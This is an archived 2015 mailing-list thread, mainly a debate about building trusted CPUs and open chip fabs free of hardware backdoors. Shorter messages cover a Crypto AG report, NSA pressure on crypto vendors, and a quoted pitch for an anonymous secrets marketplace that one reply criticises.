:o) From mirimir at riseup.net Thu Jul 30 01:22:33 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 30 Jul 2015 02:22:33 -0600 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> Message-ID: <55B9DEC9.1070500@riseup.net> On 07/30/2015 01:52 AM, grarpamp wrote: > On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney wrote: >> then it is not possible to build a trusted CPU. > > You watch while... I collect wood and ore and smelt into axe, you > trust axe. I split tree and assemble hut, you trust hut. I put > wheel in water and make mill, you trust flour. I give you magical > computer before I make abacus, you throw in river and order me > make abacus first. Eventually trusted CPU is made. Woah! How many years to build the tool chain to a trusted CPU? Also, how many people? And how to trust them? One bad apple, you know.
From mirimir at riseup.net Thu Jul 30 01:39:08 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 30 Jul 2015 02:39:08 -0600 Subject: Open Fabs In-Reply-To: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> Message-ID: <55B9E2AC.7080400@riseup.net> On 07/30/2015 02:32 AM, oshwm wrote: > would a pre-internet era set of IC's and components kick-start the process a little without losing too much trust? > Use slow old IC's in parallel to gain something usable :) There was NSA before Internet ;) > On 30 July 2015 09:22:33 BST, Mirimir wrote: >> On 07/30/2015 01:52 AM, grarpamp wrote: >>> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney >> wrote: > >> > >>>> then it is not possible to build a trusted CPU. >>> >>> You watch while... I collect wood and ore and smelt into axe, you >>> trust axe. I split tree and assemble hut, you trust hut. I put >>> wheel in water and make mill, you trust flour. I give you magical >>> computer before I make abacus, you throw in river and order me >>> make abacus first. Eventually trusted CPU is made. > >> Woah! How many years to build the tool chain to a trusted CPU? > >> Also, how many people? And how to trust them? One bad apple, you know. > > From grarpamp at gmail.com Thu Jul 30 00:52:29 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 03:52:29 -0400 Subject: Open Fabs In-Reply-To: <55B9A3DA.3040701@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> Message-ID: On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney wrote: >>> staff, with particular attention to choke points where > > That's not what I have in mind at all. Everything that touches > the production process would have to be isolated and audited. 
In > practical terms, that would mean bringing the computers in > question in from offsite, with relevant software already installed > and validated. People talk a lot about refitting and auditing existing setups. There's a lot of inbred friction there so the cost to successfully do that vs. a complete ground up trusted rebuild may be roughly equivalent. Therefore if so why not just choose the latter? > In the context at hand, watching the whole thing play out would > consist of directing the whole process one step at a time, per a > procedure created in collaboration with the contractor's > engineering and QA departments. Optical masks and/or equivalent > data files would be handled by client personnel and retained for > validation. The chips that pop out would be under very stringent > property control, and quite a lot of them would be torn down and > thoroughly analyzed "at home" to validate the run. Still sounds like untrusted base, chicken and egg. http://s12.postimg.org/n93g4udql/DSCF0431_who_came_first.jpg > depends on how reliable the post-production tear down and analysis > of end product components is considered. > A quote to the effect of "I do not care who votes, I > only care who counts the votes" comes to mind And how do you propose to count the votes when your ballots are measured in square nanometers and your counting machines are all made by one secretive company and composed of anywhere between 1B and 6B untrusted logic gates? Did you ever hear Intel say "our own designs and fabs have no backdoors and we're not subject to backdooring"? Did you ever hear GlobalF say "we don't inject backdoors in customer silicon and we're not subject to backdooring"? Would it mean anything to you if they did? Would it make any difference if they offered you a field trip? Do independents actually think their one-off decap validation project proves or gives odds on the entire line and distribution chain?
And when was any Intel / AMD CPU last publicly decapped and fully audited? 8088? Never? >> This is old school TCSEC / CC applied to manufacturing. > then it is not possible to build a trusted CPU. You watch while... I collect wood and ore and smelt into axe, you trust axe. I split tree and assemble hut, you trust hut. I put wheel in water and make mill, you trust flour. I give you magical computer before I make abacus, you throw in river and order me make abacus first. Eventually trusted CPU is made. > I think that in the engineering and business worlds, trust is > always a point on a cost curve. I'd have more trust in some kid to not destroy my lawn with the mower for $10 than some company for $50. Govt contracts seem to deliver more debt than trust and are prime example that trust and cost are separate. If not, then the HUNDREDS OF BILLIONS governments spend a year would have resulted in 5 9's of trust decades ago. But no, they can't even keep OPM secure from crackers, let alone backdoored cpu's they import from Malay fabs. Put well under 1/100 of that pie a year for a few years into a trusted open fab project and I'd bet you can get "Beyond A1" consumer gear out the other end at tolerable prices. Don't forget to charge 10+ times more for government jobs :) From grarpamp at gmail.com Thu Jul 30 01:06:21 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 04:06:21 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Thu, Jul 30, 2015 at 1:34 AM, Softy wrote: >> > IMO the same kind of radical transparency should apply to all >> > industrial processes that pose large potential hazards to public >> > health & safety, i.e. nuclear power stations, transgenic >> > agriculture, etc. > > It seems very quickly an OpenFab plant will need to implement the same > security as a current conventional plant. This will of necessity include > keeping out plebs/civilians/non-plant workers. 
And there you go again not > knowing who's doing what within the plant. Unless you happen to be on the > inside ... Not necessarily. Completely and immutably document the plant build from the start. No part of the build or operation moves forward unless all concur it meets spec. Security yes, no need to touch the machines or workers as those have all met spec beforehand. Anyone could still visit and walk the gangway, peruse webcams from home, download the document set, etc. Trust is not merely a point, but how you got there and how you maintain it thereafter. From oshwm at openmailbox.org Thu Jul 30 01:32:41 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 09:32:41 +0100 Subject: Open Fabs In-Reply-To: <55B9DEC9.1070500@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> would a pre-internet era set of IC's and components kick-start the process a little without losing too much trust? Use slow old IC's in parallel to gain something usable :) On 30 July 2015 09:22:33 BST, Mirimir wrote: >On 07/30/2015 01:52 AM, grarpamp wrote: >> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney >wrote: > > > >>> then it is not possible to build a trusted CPU. >> >> You watch while... I collect wood and ore and smelt into axe, you >> trust axe. I split tree and assemble hut, you trust hut. I put >> wheel in water and make mill, you trust flour. I give you magical >> computer before I make abacus, you throw in river and order me >> make abacus first. Eventually trusted CPU is made. > >Woah! How many years to build the tool chain to a trusted CPU? > >Also, how many people? And how to trust them? One bad apple, you know.
From oshwm at openmailbox.org Thu Jul 30 02:03:23 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 10:03:23 +0100 Subject: Open Fabs In-Reply-To: <55B9E2AC.7080400@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55B9E2AC.7080400@riseup.net> Message-ID: <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> my point being that without a publicly available global network then backdooring IC's may not have been something they were interested in :) But I guess they could still have seen some value in doing this and having modems phone home. On 30 July 2015 09:39:08 BST, Mirimir wrote: >On 07/30/2015 02:32 AM, oshwm wrote: >> would a pre-internet era set of IC's and components kick-start the >process a little without losing too much trust?
>> Use slow old IC's in parallel to gain something usable :) > >There was NSA before Internet ;) > >> On 30 July 2015 09:22:33 BST, Mirimir wrote: >>> On 07/30/2015 01:52 AM, grarpamp wrote: >>>> On Thu, Jul 30, 2015 at 12:11 AM, Steve Kinney > >>> wrote: >> >>> >> >>>>> then it is not possible to build a trusted CPU. >>>> >>>> You watch while... I collect wood and ore and smelt into axe, you >>>> trust axe. I split tree and assemble hut, you trust hut. I put >>>> wheel in water and make mill, you trust flour. I give you magical >>>> computer before I make abacus, you throw in river and order me >>>> make abacus first. Eventually trusted CPU is made. >> >>> Woah! How many years to build the tool chain to a trusted CPU? >> >>> Also, how many people? And how to trust them? One bad apple, you >know. >> >> From drwho at virtadpt.net Thu Jul 30 10:04:32 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 30 Jul 2015 10:04:32 -0700 Subject: Open Fabs In-Reply-To: <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net>
<55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> Message-ID: <55BA5920.5000903@virtadpt.net> On 07/30/2015 01:32 AM, oshwm wrote: > would a pre-internet era set of IC's and components kick-start the > process a little without losing too much trust? Use slow old IC's > in parallel to gain something usable :) Something like this? http://cpuville.com/ Or this? http://www.homebrewcpu.com/ Or maybe something like this, seeing as how we really can't trust anything integrated as the microscopic level or smaller? http://6502.org/users/dieter/mt15/mt15.htm Hell, why don't we just start building DCPU-16's and bootstrap from there? https://en.wikipedia.org/wiki/0x10c -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Maybe just one little bunny, huh?" From jya at pipeline.com Thu Jul 30 07:52:17 2015 From: jya at pipeline.com (John Young) Date: Thu, 30 Jul 2015 10:52:17 -0400 Subject: William Friedman's 1955 Crypto AG visit reports draft and final redactions Message-ID: William
Friedman's 1955 draft Crypto AG visit report shows text redacted in final version and vice versa. Two versions compared: https://cryptome.org/2015/07/nsa-crypto-ag-compared.pdf (20MB) From grarpamp at gmail.com Thu Jul 30 11:19:10 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 14:19:10 -0400 Subject: Open Fabs In-Reply-To: <55B9DEC9.1070500@riseup.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On Thu, Jul 30, 2015 at 4:22 AM, Mirimir wrote: >>> then it is not possible to build a trusted CPU. >> >> You watch while... I collect wood and ore and smelt into axe, you >> trust axe. I split tree and assemble hut, you trust hut. I put >> wheel in water and make mill, you trust flour. I give you magical >> computer before I make abacus, you throw in river and order me >> make abacus first. Eventually trusted CPU is made. > Woah! How many years to build the tool chain to a trusted CPU? As before, the knowledge already exists, so physical replication from the ground up should be very fast. TCSEC is not unknown, but designing and embedding it into every process is rather new (both as mindset and applied) so it will take some time and must be done beforehand. > Also, how many people? And how to trust them? One bad apple, you know. Again... draw interested people from multiple philosophical sectors, use multiple man rule, consensus rule. You don't have to trust them outside the fab, only observe them inside. The more principled zealots like Stallman and Juan involved the more likely someone will flag upon trust violation. The human problem is hard.
But at the end of the day, if the outcome of the project (trusted chips) is important, the right people will come together to do it and the level of trust achieved will be orders of magnitude higher than what exists today. From grarpamp at gmail.com Thu Jul 30 11:42:02 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 14:42:02 -0400 Subject: Open Fabs In-Reply-To: <55BA5920.5000903@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> Message-ID: On Thu, Jul 30, 2015 at 1:04 PM, The Doctor wrote: > On 07/30/2015 01:32 AM, oshwm wrote: >> would a pre-internet era set of IC's and components kick-start the >> process a little without losing too much trust? Use slow old IC's >> in parallel to gain something usable :) > > Something like this? > http://cpuville.com/ > http://www.homebrewcpu.com/ > Or maybe something like this, seeing as how we really can't trust > anything integrated as the microscopic level or smaller? > http://6502.org/users/dieter/mt15/mt15.htm Those are close and would certainly be a goalpost in the rebuild. You might be able to trust logic gates because you can exhaustively test their logic. On the other hand, how do you know that once you connect enough of them to each other that their secret gates inside don't sense each other and activate? Since you're that close to stone age anyway, why not start one more step back at relays and core memory. It's like trying to validate a 256 bit blackbox hash function someone gives you... sure, their supplied test vectors may all pass, but you have no idea or way to test what happens when you start pushing real data through the secret instructions. You simply can't test all the possible data combinations so you have to throw their box back in the snakeoil. 
> Hell, why don't we just start building DCPU-16's and bootstrap from there? > https://en.wikipedia.org/wiki/0x10c That's too complex, and the first one pre-exists so it's chicken and egg. From drwho at virtadpt.net Thu Jul 30 15:11:44 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 30 Jul 2015 15:11:44 -0700 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> Message-ID: <55BAA120.2050901@virtadpt.net> On 07/30/2015 11:42 AM, grarpamp wrote: > because you can exhaustively test their logic. On the other hand, > how do you know that once you connect enough of them to each other > that their secret gates inside don't sense each other and activate? > Since you're that close to stone age anyway, why not start one more > step back at relays and core memory. So what you're basically saying is that the entire tech stack, all the way back to far edge of electromechanical information processing is basically completely untrustworthy. There is no way at all to trust anything that we can't actually see the logic gates of with the naked eye, which would put us... where? Maybe tens of computations per second, at most? A little more (but not much)? Fuck it. Time to go home, everyone. They Won. -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "The cafe' hates boring."
--Blackie, _Nightmare Cafe'_ From wirelesswarrior at safe-mail.net Thu Jul 30 12:13:50 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Thu, 30 Jul 2015 15:13:50 -0400 Subject: Open Fabs Message-ID: I still maintain that bootstrapping is best done using EBL to create LSI and less complex VLSI (USB chips, CPLD and FPGA). Sure EBL is slow but it can eliminate the cost and complexity of masking. EBL immensely simplifies the foundry and offers the possibility for OS distributed design and manufacture, affordable for "maker" groups, without involving a commercial entity. The number of trusted parties shrinks significantly. From schear.steve at gmail.com Thu Jul 30 08:49:56 2015 From: schear.steve at gmail.com (Steven Schear) Date: Thu, 30 Jul 2015 15:49:56 +0000 Subject: William Friedman's 1955 Crypto AG visit reports draft and final redactions In-Reply-To: References: Message-ID: During the early 90s I worked at Cylink, a Crypto AG competitor. We too received a NSA visit about weakening products sold to certain clients (e.g., so-called narco-terrorists).
I and the other directors were told of this (because we had legal responsibilities and liabilities) at a meeting. I assume we made the changes requested (e.g., weakening the RNG to NSA specifications). The special units were sold through a selected distributor in Louisiana (probably also a NSA contractor). On Thu, Jul 30, 2015 at 2:52 PM, John Young wrote: > William Friedman's 1955 draft Crypto AG visit report shows text > redacted in final version and vice versa. Two versions compared: > > https://cryptome.org/2015/07/nsa-crypto-ag-compared.pdf > (20MB) > From grarpamp at gmail.com Thu Jul 30 14:19:32 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 17:19:32 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Thu, Jul 30, 2015 at 3:13 PM, wrote: > I still maintain that bootstrapping is best done using EBL to create LSI and less complex VLSI (USB chips, CPLD and FPGA). Sure EBL is slow but it can eliminate the cost and complexity of masking. EBL immensely simplifies the foundry and offers the possibility for OS distributed design and manufacture, affordable for "maker" groups, without involving a commercial entity. The number of trusted parties shrinks significantly. Who can spot the two untrusted parties in this chickenegg EBL rig? https://en.wikipedia.org/wiki/File:EB_litograph.jpg And what are they driving? D-oh. EBL would be fine if its control was rebuilt as trusted gear. Just links...
https://en.wikipedia.org/wiki/Electron-beam_lithography https://en.wikipedia.org/wiki/Integrated_circuit#VLSI https://en.wikipedia.org/wiki/Universal_Systems_Language https://en.wikipedia.org/wiki/File:Apollo_guidiance_computer_ferrit_core_memory.jpg https://en.wikipedia.org/wiki/File:Agc_nor2.jpg https://www.youtube.com/watch?v=k4oGI_dNaPc https://www.youtube.com/watch?v=n3wPBcmSb2U From juan.g71 at gmail.com Thu Jul 30 14:31:47 2015 From: juan.g71 at gmail.com (Juan) Date: Thu, 30 Jul 2015 18:31:47 -0300 Subject: Open Fabs In-Reply-To: <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55B9E2AC.7080400@riseup.net> <2526DBD7-75B0-47C2-866F-ED6E46F53ECC@openmailbox.org> Message-ID: <55ba9755.05a58c0a.3166.739f@mx.google.com> On Thu, 30 Jul 2015 10:03:23 +0100 oshwm wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > my point being that without a publicly available global network then > backdooring IC's may not have been something they were interested > in :) It should be possible to use 'older' components that can't be backdoored or that are highly unlikely to be backdoored to build tools to validate newer untrusted systems? > > But i guess they could still have seen some value in doing this and > having modems phone home. 
> > > From grarpamp at gmail.com Thu Jul 30 17:13:08 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:13:08 -0400 Subject: Open Fabs In-Reply-To: <55BAA120.2050901@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> Message-ID: On Thu, Jul 30, 2015 at 6:11 PM, The Doctor wrote: > So what you're basically saying is that the entire tech stack, all the > way back to far edge of electromechanical information processing is > basically completely untrustworthy. A purist might say that, and you'd have a hard time refuting them because for the most part, you raced to build a system that "works", not necessarily one you "trust" or that is proofed. The point is, that if you're going to consider, analyze, create and certify trust, you have to rip apart your current way of thinking in some pretty mind bending ways. Because everyone has been cultured since birth to accept things that are blindly handed to them as trusted. Where along the historical line of tools would you feel confident or shaky in using such tool, effectively blindly dropped into your hand, to create or do something you trust with it, and why? From sandpaper to CNC machine... From knife to MRI... From relay to the latest Xeons and ARM's... https://www.schneier.com/blog/archives/2006/01/countering_trus.html Even with things like this, when it comes to hardware it's still turtles. You can't use an Intel CPU to crosscheck an Intel CPU. With actors like the NSA and datagrabber ideology inserting and rooting stuff everywhere, you probably can't use any other closed CPU either. Destructively testing your rig just to replace it with an untested copy is pointless.
> There is no way at all to trust > anything that we can't actually see the logic gates of with the naked > eye Theoretically, if the image data is passed through a computer to your eye on the screen, yes. Unless you know that the entire history and process that produced the suspect gates that were just placed in your hand (or equivalently, your imaging rig)... is trusted. > which would put us... where? Maybe tens of computations per > second, at most? A little more (but not much)? No, use that level to build the next faster and so on. > Fuck it. Time to go home, everyone. They Won. Purists? Turtles? Who knows. But one thing's for certain, today's hardware and production is closed. And just as with closed source software, it would be a far stretch to point at the billion+ transistors on your desk and genuinely say "Yeah, I trust that". That should be enough reason to put serious thought and action into creating an opensource process that could print trusted opensource hardware... an open fab. Otherwise you're effectively saying "Fuck it". From grarpamp at gmail.com Thu Jul 30 17:24:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:24:11 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On Thu, Jul 30, 2015 at 7:25 PM, Zenaan Harkness wrote: > > Ahh yes! Federal politician, State politician, Local politician, > police occifer, detective, CIA agent, FBI agent, NSA agent, KGB agent, > Richard Stallman, Juan. > > That should do it? Agency is a maddening asymptote of turtles... single, double, triple, quad... Eventually it reaches near Juan's domain who will always tell you straight. 
So yeah, that should do just fine ;-) From grarpamp at gmail.com Thu Jul 30 17:30:21 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:30:21 -0400 Subject: Kim Dotcom on Politics, TPP, Law, Crypto, Copyright, Endgame, Perseverance Message-ID: Kim Dotcom was the founder of Megaupload, its successor Mega, and New Zealand's Internet Party. A while ago you had a chance to ask him about those things as well as the U.S. government charging him with criminal copyright violation and racketeering. Below you'll find his answers to your questions... http://yro.slashdot.org/story/15/07/27/200204/interviews-kim-dotcom-answers-your-questions From skquinn at rushpost.com Thu Jul 30 18:52:41 2015 From: skquinn at rushpost.com (Shawn K. Quinn) Date: Thu, 30 Jul 2015 20:52:41 -0500 Subject: slur: you're going to hate it In-Reply-To: <20150731011530.GA5234@android> References: <20150731011530.GA5234@android> Message-ID: <1438307561.31563.1.camel@moonpatrol> On Thu, 2015-07-30 at 21:15 -0400, Nick Econopouly wrote: > Paste for those who don't want to load the webpage: > > > http://slur.io/ > Slur: You're going to hate it. > > "Slur is an open source, decentralized and anonymous marketplace for the > selling of secret information in exchange for bitcoin. Slur is written > in C and operates over the Tor network with bitcoin transactions through > libbitcoin. Both buyers and sellers are fully anonymous and there are no > restrictions on the data that is auctioned. There is no charge to buy or > sell on the Slur marketplace except in the case of a dispute, where a > token sum is paid to volunteers. - See more at: > http://slur.io/#sthash.OsHtOC5o.dpuf" [...] This is either going to be very good or very bad. Only time will tell which way this goes. -- Shawn K. 
Quinn From nickeconopouly at gmail.com Thu Jul 30 18:15:30 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Thu, 30 Jul 2015 21:15:30 -0400 Subject: slur: you're going to hate it Message-ID: <20150731011530.GA5234@android> Paste for those who don't want to load the webpage: http://slur.io/ Slur: You're going to hate it. "Slur is an open source, decentralized and anonymous marketplace for the selling of secret information in exchange for bitcoin. Slur is written in C and operates over the Tor network with bitcoin transactions through libbitcoin. Both buyers and sellers are fully anonymous and there are no restrictions on the data that is auctioned. There is no charge to buy or sell on the Slur marketplace except in the case of a dispute, where a token sum is paid to volunteers. - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" "How does it work ? Sellers encrypt, upload and then list their data on the digital market with the ease a user might list an item on eBay. They do so with full anonymity and there are no restrictions on the content of the data. Exclusive bidders attempt to purchase the data for their own use and / or prevent other parties from acquiring a copy. Should an exclusive bidder win the auction they alone will receive the decryption keys. The same data cannot be auctioned a second time on the Slur marketplace. Crowd bidders pool their funds into a single bid. Should they win the auction the network will release the decryption keys to all users on the Slur marketplace and the information will therefore become public. Arbitrators are randomly selected users who agree to weigh in on a dispute should the winner of an auction claim that the decrypted contents do not match the sellers description. Public key cryptography ensures the data being sold can only be decrypted by the winner of the auction. 
- See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" "Implications: If correctly implemented this platform will have a profound and lasting effect on our society. An unregulated free market for information would redefine the net worth of every person as their material assets would in the future be weighed against the market value of their secrets. As damaging as Slur can be to individuals it is considerably more so for groups It's estimated that 5% of the general population are psychopaths. Introducing financial incentive in an anonymous framework will produce a greater yield of leaked information than from say the ideology that drove patriots like Edward Snowden. For every idealist willing to selflessly sacrifice their freedom, assets and even risk their lives for a greater good, there are 1000 psychopaths willing to anonymously sell out their peers for material gain. Organizations of every type; governments, corporations and the military are in the unfortunate predicament of having both a great deal of liquid assets and a large number of secrets to protect - accessible by numerous disgruntled or psychopathic personnel. When Slur becomes ubiquitous it will bleed organizations secrets and funds. The Slur marketplace will sharply increase demand for bitcoin from those parties attempting to purchase previously inaccessible secret information and organizations scrambling to suppress damaging leaks from inside their own ranks or security breaches. The Slur market is WikiLeaks 2.0. An incalculable resource for public knowledge and unfiltered access to the truth. Except that in the future journalists will need to compensate whistle blowers for the extreme risks they take. The types of information we expect to see on the Slur marketplace ; Trade secrets. Designs for every type of consumer product. The source code for proprietary operating systems and high end CAD software. Zero day exploits. 
For the market defined value rather than a price determined by the corporations under the guise of a bounty with the veiled threat of legal action should the researcher choose to sell elsewhere. The details of backdoors covertly installed inside industrial and consumer hardware and software. Stolen databases. Corporations will no longer be able to get away with an apology when they fail to secure their customers confidential data. They will have to pay the market value to suppress it. Proof of tax evasion from disgruntled or underpaid employees. Both the IRS and the public have an interest in that information and the corporations will have to bid to suppress it - a very quantifiable and predictable payoff for the seller. Military intelligence relevant to real-time conflicts. Aerospace and defense designs. Evidence relevant to ongoing trials. Unflattering celebrity photos and videos. The complete databases of social media sites like facebook. Proof of government corruption. Close to an election. - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" The site appeals for donations and has a crossed out sentence saying production versions will be available in july 2015. Thoughts? -nick From zen at freedbms.net Thu Jul 30 16:25:34 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 30 Jul 2015 23:25:34 +0000 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On 7/30/15, grarpamp wrote: > On Thu, Jul 30, 2015 at 4:22 AM, Mirimir wrote: >> Also, how many people? And how to trust them? One bad apple, you know. > > Again... draw interested people from multiple philosophical sectors, use > multiple man rule, consensus rule. Ahh yes! Federal politician, State politician, Local politician, police occifer, detective, CIA agent, FBI agent, NSA agent, KGB agent, Richard Stallman, Juan. That should do it? 
From oshwm at openmailbox.org Thu Jul 30 15:34:56 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 23:34:56 +0100 Subject: Open Fabs In-Reply-To: <55BAA120.2050901@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> Message-ID: <55BAA690.1070801@openmailbox.org> On 30/07/15 23:11, The Doctor wrote: > On 07/30/2015 11:42 AM, grarpamp wrote: > > > because you can exhaustively test their logic. On the other hand, > > how do you know that once you connect enough of them to each other > > that their secret gates inside don't sense each other and activate? > > Since you're that close to stone age anyway, why not start one more > > step back at relays and core memory. > > So what you're basically saying is that the entire tech stack, all the > way back to far edge pf electromechanical information processing is > basically completely untrustworthy. There is no way at all to trust > anything that we can't actually see the logic gates of with the naked > eye, which would put us... where? Maybe tens of computations per > second, at most? A little more (but not much)? > > Fuck it. Time to go home, everyone. They Won. > That is spot on, we can't trust any of it and most people would concede that we have lost the battle. So (in my fairly inexperienced opinion in this field) there are possibly two options:- 1) Re-invent the last 65 years of Computing - not impossible and we have the knowledge amongst most average tinkerer to do this but maybe it'll take us 10-20 years to catch up, utilising (potentially massively) parallel processing from early on in the process to gain speeds that were not common in the past at certain tech levels. 2) Look at if it is possible for us to develop trustworthy systems using untrustworthy components. 
Is there a way we can maybe use multiple components to compare their outputs to see if any of them are not trustworthy? Or maybe identify untrustworthy results from operations and ignore them, favouring trustworthy results? -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From zen at freedbms.net Thu Jul 30 16:43:05 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 30 Jul 2015 23:43:05 +0000 Subject: Open Fabs In-Reply-To: <55BAA690.1070801@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> <55BAA690.1070801@openmailbox.org> Message-ID: On 7/30/15, oshwm wrote: > On 30/07/15 23:11, The Doctor wrote: >> On 07/30/2015 11:42 AM, grarpamp wrote: >> > because you can exhaustively test their logic. On the other hand, >> > how do you know that once you connect enough of them to each other >> > that their secret gates inside don't sense each other and activate? >> > Since you're that close to stone age anyway, why not start one more >> > step back at relays and core memory. >> >> So what you're basically saying is that the entire tech stack, all the >> way back to far edge pf electromechanical information processing is >> basically completely untrustworthy. There is no way at all to trust >> anything that we can't actually see the logic gates of with the naked >> eye, which would put us... where? Maybe tens of computations per >> second, at most? A little more (but not much)? >> >> Fuck it. Time to go home, everyone. They Won. >> > > That is spot on, we can't trust any of it and most people would concede > that we have lost the battle. I don't buy that. 
0) Whilst using modern Intel vaseline chips:

1) Program full FLOSS stack for circuit/chip dev:
# some starts:
apt-cache search circuit
apt-cache search electron

2) Start with one of the FLOSS CPUs, eg SPARC2, and divide and conquer its analysis audit.

3) With open audited/auditable fab, we burn some chips.

4) Now divide and conquer to analyse those physical chips, using physical analysis one step below the process node - eg 120nm chip, 60nm chip analysis.

As these steps occur, software is developed to facilitate each step of course. Proprietary software for the audit bits though to make sure it is not backdoored by Intel.

From zen at freedbms.net Thu Jul 30 23:23:58 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 31 Jul 2015 06:23:58 +0000 Subject: slur: you're going to hate it In-Reply-To: <20150731011530.GA5234@android> References: <20150731011530.GA5234@android> Message-ID:

I have serious problems with this - leak by economic purchasing power? Where's the principle in that? What could possibly go wrong?

This allows the mega wealthy to pay for the protection of their data. If such a market actually gets going, if nothing else it's a turbo charged economic greasing of economic information blackmail.

Please people, think before you support such a thing.

Obviously the oligarchies around the planet will love such a thing (they print the money anyway, so a few dollars is pocket change - a pittance to them anyway).

I guess we had to see such reactions to Snowden and his ilk.

